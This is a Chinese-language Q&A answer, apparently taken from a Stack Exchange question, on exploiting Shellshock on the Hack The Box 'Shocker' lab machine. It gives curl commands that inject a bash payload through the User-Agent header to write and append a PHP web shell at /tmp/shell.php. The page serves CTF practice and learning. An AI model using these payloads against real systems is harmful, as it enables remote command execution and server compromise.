You need to enable JavaScript to run this app.
优惠活动
大模型
产品
解决方案
定价
更多

求助:Hack The Box平台Shocker靶机中curl编辑文件的用法

Shocker靶机中用curl编辑文件的具体方法

在Shocker靶机的Shellshock漏洞利用环节,用curl编辑/写入文件的核心是借助漏洞在请求头中注入执行命令的payload,具体用法如下:

1. 写入新文件

通过curl添加带有Shellshock payload的请求头,执行echo命令将内容写入目标路径:

curl -H "User-Agent: () { :; }; echo '<?php system(\$_GET[\"cmd\"]); ?>' > /tmp/shell.php" http://<目标IP>/cgi-bin/user.sh
  • 替换<目标IP>为Shocker靶机的实际IP
  • /cgi-bin/user.sh是靶机上存在的CGI脚本路径(若扫描到其他可访问的CGI脚本,替换成对应路径即可)
  • 命令中echo '内容' > 文件路径的作用是将指定内容覆盖写入目标文件,这里示例写入了PHP一句话木马到/tmp/shell.php

2. 追加内容到已有文件

如果需要向已存在的文件追加内容,将命令中的>替换为>>即可:

curl -H "User-Agent: () { :; }; echo 'echo \"追加的内容\"' >> /tmp/shell.php" http://<目标IP>/cgi-bin/user.sh

注意事项

  • 确保目标路径有写入权限,/tmp目录在大多数Linux系统中默认开放写入权限,是优先选择的路径
  • 若payload执行失败,检查CGI脚本是否确实存在、靶机是否开启Shellshock漏洞,以及命令中的特殊字符是否正确转义

内容的提问来源于stack exchange,提问作者s1500

相关产品推荐
方舟 Agent Plan

超全模态模型 × Harness 升级,最新支持 Deepseek-V4.1-Flash、GLM-5.3 系列、Doubao-Seedream-5.0-pro、Kimi-K3 (部分), 限时 9.9 元起

最近更新时间:2026.06.28 14:46:01